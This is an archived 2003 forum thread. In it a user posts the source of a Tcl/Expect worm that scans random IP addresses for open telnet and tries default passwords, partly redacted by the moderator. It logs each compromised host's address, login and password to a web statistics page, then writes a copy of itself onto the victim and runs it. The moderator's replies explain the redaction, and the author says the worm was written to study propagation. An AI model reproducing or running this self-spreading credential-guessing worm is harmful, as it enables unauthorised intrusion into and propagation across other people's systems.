Posted by sirius_black (sirius_black), 12 December 2003
Hi !!
Here is a worm coded in Tcl/Expect.
It's the first version.
It's looking for boxes with default passwords and saves the ip/login/password in a database (accessed by a php script).
If you have some ideas to improve it...
Code:#!/usr/bin/expect # tclworm v1.0 # by sirius_black # http://membres.lycos.fr/lotfree
if {[fork]!=0} exit disconnect
set wget_found 0 set telnet_found 0 set wget_path "" set telnet_path ""
set liste_telnet { "" "" admin 1234 admin admin *** Chunk of information removed here for security reasons *** test test User "" write "private" write synnet }
set liste_cisco { "" "" admin admin admin "default" *** Chunk of code removed here for security reasons *** ripeop "" root attack }
proc get_random_ip {} { set tcl_precision 3 set ip "" append ip [expr round((rand()*1000)/4)] for {set i 0} {$i < 3} {incr i 1} { append ip "." append ip [expr round((rand()*1000)/4)] } return $ip }
proc is_telnet_open ip { set is_open 0 if { [catch {set sock [socket $ip 23]} ] } { set is_open 0 } else { set is_open 1 close $sock } return $is_open }
proc where_are_progs {} { global wget_found global telnet_found global wget_path global telnet_path if [file exists "/usr/bin/wget"]==1 { set wget_found 1 set wget_path "/usr/bin/wget" } if [file exists "/usr/bin/telnet"]==1 { set telnet_found 1 set telnet_path "/usr/bin/telnet" } }
proc whereis_worm {} { set worm_path [pwd] set file_name [lindex [split [info script] "/"] end] append worm_path "/" $file_name return $worm_path }
proc get_content {} { set f [open [whereis_worm] "r"] set texte "" while { ![eof $f] } { set ligne [gets $f] set ligne [string map {\\ \\\\ \$ \\\$ \` \\\`} $ligne] set ligne [string trim $ligne] append texte "$ligne\n" } close $f return $texte }
proc MyIpaddr {} { set addr "" if {[catch {dns address [info hostname]} addr]} { set server [socket -server # 0] set port [lindex [fconfigure $server -sockname] 2] set host [lindex [fconfigure $server -sockname] 1] set client [socket $host $port] set addr [lindex [fconfigure $client -sockname] 0] close $client close $server } return $addr }
proc MyNet {} { set net "" regexp {(.*)\..*} [MyIpaddr] {} net return $net }
proc declare_becane {ip login password} { set lheaders "Connection close" if {![llength [info commands "::http::geturl"]]} { if {[catch {package require http}]} { return "zut" } } ::http::config -useragent "TCLWORM v1.0 (LOTFREE)" set htmlUrl "http://localhost:3128/wormstat.php?ip=$ip&login=$login&pass=$password" if { [catch { ::http::geturl $htmlUrl} token]} { return "zut" } if { [::http::status $token] != "ok"} { return "zut" } set htmlFile [::http::data $token] if { [regexp "haxored" $htmlFile] == 1 } { return "next" } return "go" }
where_are_progs
set ip "" while {1==1} { set ip [get_random_ip] if { [regexp "^127" $ip] == 1 } { continue } if { ![is_telnet_open $ip] } { continue } else { if {$telnet_found == 1} { #on utilise telnet foreach {login passwd} $liste_telnet { spawn -noecho $telnet_path $ip 23 expect { "ogin:" { send "$login\n" } "user:" { send "$login\n" } "imeout" { continue } "ailure" { continue } "nknow host" { continue } "o route to host" { continue } "o adresse associated with name" { continue } } expect { "incorrect" { continue } "ssword:" { send "$passwd\n" } } expect { "ast login:" { if { [declare_becane $ip $login $passwd] == "next" } { send "logout\nexit\n" continue } else { exec sleep 2 send "cat > tclworm << EOF\n" expect ">" send [get_content] expect ">" send "EOF\n" expect "$" send "chmod +x tclworm\n" expect "$" send "./tclworm\n" expect "$" send "logout\nexit\n" break } } } } } # fin de on utilise telnet
} }
This post was modified to remove data which could help malicious users run the program against networks where they are not authorised to do so. See follow up post for my fuller explanation - Graham
Posted by admin (Graham Ellis), 13 December 2003
Hmmm
Expect is a great tool for automated testing which is exactly what you're using it for ...
Programs such as the one that you have posted are valuable in the right hands - they allow (let us say) a system administrator to check the security of his own network against break-ins. But in the wrong hands, such programs provide tools for the unauthorised visitor to find weaknesses and attempt break-ins.
Posting up complete code for a "worm" such as this is similar to posting up someone else's password in that it lessens their security and for this reason I am modifying your post to remove some of the data (not-Tcl) elements of the code. That way, it remains available for discussion of the Tcl issues, but doesn't provide anyone who happens to find it with a breaking-in tool!
Graham (Wearing his moderator's hat!)
Posted by sirius_black (sirius_black), 15 December 2003
Yes, I understand.
The reason I made it was only to understand how a worm works.
I don't want the worm to delete files or crash systems. I only use it to see statistics of propagation ...
It was very interestant (does this word exist in English?) to code it
and I want to share the source with other programmers.
Posted by admin (Graham Ellis), 15 December 2003
I'm 100% happy with posting / sharing code - I just modified it slightly so that this board doesn't become a place for people to get hold of code that could easily be misused.
This page is a thread posted to the opentalk forum at www.opentalk.org.uk and archived here for reference.